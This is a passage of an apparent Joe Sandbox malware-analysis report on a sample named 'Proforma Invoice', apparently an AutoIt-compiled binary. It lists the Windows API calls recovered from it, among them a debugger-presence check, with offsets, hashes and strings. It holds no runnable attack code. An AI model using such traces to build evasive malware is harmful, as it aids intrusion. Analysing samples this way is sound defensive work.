                                                                                                  • Part of subcall function 006FC816: VariantCopy.OLEAUT32(00000000,?), ref: 006FC88C
                                                                                                • VariantClear.OLEAUT32(?), ref: 006FC556
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Init$ClearCopy_memmove
                                                                                                • String ID: d}u
                                                                                                • API String ID: 2932060187-174143718
                                                                                                • Opcode ID: d729143f225b4a8dbf420e82e5ea7608ccb0c4181f59cd88ffbb51f57c17a6e7
                                                                                                • Instruction ID: 48ba30aaeb2bfb64ca1e6cc36fb7a17e732f3cf3e76dbc0e3a206c2ccc99879c
                                                                                                • Opcode Fuzzy Hash: d729143f225b4a8dbf420e82e5ea7608ccb0c4181f59cd88ffbb51f57c17a6e7
                                                                                                • Instruction Fuzzy Hash: 221100719007089FC720EF99D88489AF7F8FF18310B50862EE58AD7611D775AA49CF94
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassName_wcscmp
                                                                                                • String ID: #32770
                                                                                                • API String ID: 2292705959-463685578
                                                                                                • Opcode ID: 2c3cd1fb7cf0f9b0d0a1557d0dcdc615ea9ade81e3456454e5b8e855b98ed2de
                                                                                                • Instruction ID: a2fbeee582c40bc04f4c6dcefd8467175c4465e9436ccf9e4fe9c149980efbc6
                                                                                                • Opcode Fuzzy Hash: 2c3cd1fb7cf0f9b0d0a1557d0dcdc615ea9ade81e3456454e5b8e855b98ed2de
                                                                                                • Instruction Fuzzy Hash: 01E022726002282BD320AA99AC0AFA7F7ACEB40B20F00002AFD00D2141E9A4AA1587E4
                                                                                                APIs
                                                                                                  • Part of subcall function 006DB314: _memset.LIBCMT ref: 006DB321
                                                                                                  • Part of subcall function 006C0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006DB2F0,?,?,?,006A100A), ref: 006C0945
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,006A100A), ref: 006DB2F4
                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006A100A), ref: 006DB303
                                                                                                Strings
                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006DB2FE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                • API String ID: 3158253471-631824599
                                                                                                • Opcode ID: b560481dfaddc1c3cc0711e3cf758523b50b9a1488865464da64e1f9cef35f38
                                                                                                • Instruction ID: cf7ea173e92151b7fdb81c54a634972d0d8c87d66363e45c289f9b11981863d2
                                                                                                • Opcode Fuzzy Hash: b560481dfaddc1c3cc0711e3cf758523b50b9a1488865464da64e1f9cef35f38
                                                                                                • Instruction Fuzzy Hash: 46E06DB0600710CFE760EF28D4087467AE4BF00744F068A7DE456C7341E7B8D405CBA1
                                                                                                APIs
                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006F7C82
                                                                                                  • Part of subcall function 006C3358: _doexit.LIBCMT ref: 006C3362
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message_doexit
                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                • API String ID: 1993061046-4017498283
                                                                                                • Opcode ID: 45d158840818453b299d1905035d4f882fd739532775cdcadf7df1f32d49b403
                                                                                                • Instruction ID: 13e1fe1f87d2c0db3f9bbfc2706982d5bb301e50bc5dcff2b574099adf39d3c3
                                                                                                • Opcode Fuzzy Hash: 45d158840818453b299d1905035d4f882fd739532775cdcadf7df1f32d49b403
                                                                                                • Instruction Fuzzy Hash: 7AD0C2323C435836E15432A8AC06FDA36498B05B12F004429FF08991D349D5488042BC
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 006E1775
                                                                                                  • Part of subcall function 0071BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,006E195E,?), ref: 0071BFFE
                                                                                                  • Part of subcall function 0071BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0071C010
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 006E196D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                • String ID: WIN_XPe
                                                                                                • API String ID: 582185067-3257408948
                                                                                                • Opcode ID: d60ca05a0790534a46fa220b3c35ab5ccfd78b33e5879b2328fa57206ce90ec0
                                                                                                • Instruction ID: 89305ba80f36e424e2df8449a4d6642978ac8001be709c0a4fa4d8a84fcd9ef0
                                                                                                • Opcode Fuzzy Hash: d60ca05a0790534a46fa220b3c35ab5ccfd78b33e5879b2328fa57206ce90ec0
                                                                                                • Instruction Fuzzy Hash: 6DF06D70801248DFCF25DB92C988AECBBF9FB09701F500096E002A6190C7744F86EF24
                                                                                                APIs
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0072596E
                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00725981
                                                                                                  • Part of subcall function 00705244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007052BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 529655941-2988720461
                                                                                                • Opcode ID: 3008bb0ac02cbfc54b08980a4ae3935f840fc1e69a518ba3fcb8f96d275da3f6
                                                                                                • Instruction ID: 33c5fe6c7da96e01cbbbb27aac3ead5ee51390652a0a629d3982c4c4b0534c7a
                                                                                                • Opcode Fuzzy Hash: 3008bb0ac02cbfc54b08980a4ae3935f840fc1e69a518ba3fcb8f96d275da3f6
                                                                                                • Instruction Fuzzy Hash: 13D0C971384311B7E6B4BB709C0FFD76A64BF00B51F004835F649AA1D0D9E89811CA98
                                                                                                APIs
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007259AE
                                                                                                • PostMessageW.USER32(00000000), ref: 007259B5
                                                                                                  • Part of subcall function 00705244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007052BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 529655941-2988720461
                                                                                                • Opcode ID: 8c58e49ffcfd5c24864de621a7a5c7ca685bb4e8f28816fa94f80ba549fd3e11
                                                                                                • Instruction ID: e08c3741d683211ca722ba76ccadd7c31a7f33b426973c66d5405b13756d8cdd
                                                                                                • Opcode Fuzzy Hash: 8c58e49ffcfd5c24864de621a7a5c7ca685bb4e8f28816fa94f80ba549fd3e11
                                                                                                • Instruction Fuzzy Hash: 2BD0C971380311BBE6B4BB709C0FFD76664BF04B51F004835F645AA1D0D9E8A811CA98